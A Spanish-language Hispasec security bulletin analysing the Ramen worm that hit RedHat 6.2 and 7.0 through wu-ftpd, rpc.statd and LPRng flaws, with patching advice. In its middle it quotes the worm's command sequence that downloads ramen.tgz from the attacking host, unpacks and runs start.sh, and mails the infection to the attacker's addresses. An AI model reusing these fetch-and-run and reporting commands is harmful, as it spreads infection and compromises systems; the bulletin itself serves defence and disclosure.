En los últimos días ha surgido en la red un gusano que ya se encuentra
in the wild. Ramen, nombre que recibe este nuevo patógeno, afecta a
sistemas RedHat 6.2 y RedHat 7.0 aprovechándose de vulnerabilidades
conocidas desde hace tiempo y con parches para ellas en los servicios
rpc, wuftp o LPRng.
Este nuevo gusano ha pillado desprevenida a toda la comunidad Linux,
que no esperaba nada semejante y siempre ha permanecido convencida de
la seguridad de sus sistemas frente a virus y gusanos que tanto
afectan en la actualidad a los sistemas Windows. Pero en esta ocasión,
una elaborada y efectiva colección de herramientas destinadas a
explotar vulnerabilidades ha conseguido poner en jaque a los sistemas
Linux de todo el mundo.
Es falso que no existen virus o gusanos para Linux o Unix, pero en la
actualidad la propia arquitectura de Windows se presenta como una
plataforma más vulnerable ante el ataque de virus en comparación con
la robustez que pueden alcanzar los sistemas Unix convenientemente
administrados. Sin embargo, Ramen representa un serio toque de
atención tanto a la comunidad Unix como a las propias casas antivirus,
que a partir de ahora deberán prestar mayor atención a posibles brotes
de este tipo de especímenes.
Ramen afecta a sistemas RedHat Redhat 6.2 a través de un servicio rpc
explotable o de un wuftpd vulnerable, para los sistemas RedHat 7.0 el
gusano infecta haciendo uso de una vulnerabilidad en LPRng. A su paso,
el gusano deja un rastro de páginas web modificadas en los servidores
atacados, con un gráfico en el que se hace alusión a los tallarines
orientales de marca Ramen. En la página modificada el gusano también
deja la frase «Hackers looooooooooooove noodles,» y aparece firmado
como «RameN Crew». Ya han aparecido hasta servidores de la NASA con
esta huella que da signos evidentes del paso del gusano por el
sistema.
Ramen realiza un escaneo de clases B mediante una exploración SYN
consistente en una versión modificada de synscan. Esta exploración
puede llevar entre 15 y 25 minutos y pretende localizar sistemas
Redhat 6.2 o 7.0. Durante el rastreo Ramen comprueba el anuncio del
tipo de servidor de FTP, sólo comprueba el puerto 21 para esto, si
aparece la cadena «Mon Feb 28» grabará la IP y/o el nombre de host en
el archivo «.w». En cambio, si encuentra la cadena «Wed Aug 9»,
grabará los datos en el archivo «.l». De esta forma realiza una
clasificación de la versión de sistema operativo, RedHat 6.2 en el
primer caso y 7.0 en el segundo.
Tras esto se lanzarán dos scripts diferentes dependiendo de cada
sistema contra las direcciones de dichos archivos. Contra las máquinas
RedHat 6.2 empleará la lista del archivo «.w» ejecutará primero un
exploit contra el wu-ftpd, tras este ataque se ejecutará un exploit
contra rpc.statd en la máquina objetivo. En caso de lograr su objetivo
ejecutará la siguiente secuencia de comandos:
mkdir /usr/src/.poop;cd /usr/src/.poop
export TERM=vt100
/usr/src/.poop/ramen.tgz»>lynx -source http://FROMADDR:27374 > /usr/src/.poop/ramen.tgz
cp ramen.tgz /tmp
gzip -d ramen.tgz;tar -xvf ramen.tar;./start.sh
echo Eat Your Ramen! : mail -s TOADDR -c gb31337@hotmail.com
gb31337@yahoo.com
Destinada a enviar un mensaje con las direcciones de la máquina desde
la que se lanza el ataque y la nueva máquina infectada. El mail se
envía a las direcciones gb31337@hotmail.com y gb31337@yahoo.com
Para atacar a los sistemas con RedHat 7 Ramen emplea un ataque contra
LPRng. Este programa es una implementación de una utilidad de spool de
impresora.
Una vez en el sistema el gusano establece un pequeño servidor HTTP/0.9
en el puerto 27374 que se emplea para servir copias de si mismo al
exterior (esto se realiza a través de inetd en RedHat 6.2 y xinetd en
RedHat 7.0). para reproducirse a si mismo, determina la dirección IP
y elima los servicios vulnerable que le han servido para introducirse
en el sistema. Es decir, en RedHat 6.2 eliminará rpc.statd y en
RedHat 7.0 lpd. De forma adicional añadirá los usuarios «ftp» y
«anonymous» al archivo /etc/ftpusers para cerrar el agujero en
wu-ftpd. Para finalizar modificará todos los archivos index.html por
la página anteriormente descrita.
Para evitar la infección por este gusano es conveniente actualizar los
sistemas RedHat. Todas los parches necesarios para cubrir las
vulnerabilidades descritas se encuentran disponibles en el sitio web
de RedHat. Hay que aclarar, como ya hemos comentado, que los parches
no son específicos para este gusano, sino que cierran vulnerabilidades
detectadas y solucionadas hace tiempo.
Desde Hispasec una vez más recordamos y recomendamos la necesidad de
mantener los sistemas actualizados, labor que deben realizar tanto los
administradores de sistemas en las empresas como los usuarios en sus
equipos domésticos.
antonior@hispasec.com
Más información:
Descripción de Ramen
http://members.home.net/dtmartin24/ramen_worm.txt
Vulnerabilidad en wu-ftp (Securityfocus)
http://www.securityfocus.com/vdb/bottom.html?vid=1387
Vulnerabilidad en rpc.statd (Securityfocus)
http://www.securityfocus.com/vdb/bottom.html?vid=1480
Vulnerabilidad en LPRng (Securityfocus)
<a href="http://www.securityfocus.com/vdb/bottom.html?vid=1712</Ahttp://www.securityfocus.com/vdb/bottom.html?vid=1712</A<
Ramen afecta a la NASA (Securityfocus)
<a href="http://www.securityfocus.com/templates/article.html?id=141</Ahttp://www.securityfocus.com/templates/article.html?id=141</A<
Silicon.com
http://www.silicon.com/public/door?REQUNIQ=979925654&6004REQEVENT=&REQINT1=42151&REQSTR1=newsnow
Linux Today
http://linuxtoday.com/news_story.php3?ltsn=2001-01-18-006-06-SC
Computerworld
http://www.computerworld.com/cwi/stories/0,1199,NAV47-68-84-88_STO56475,00.html
Deja una respuesta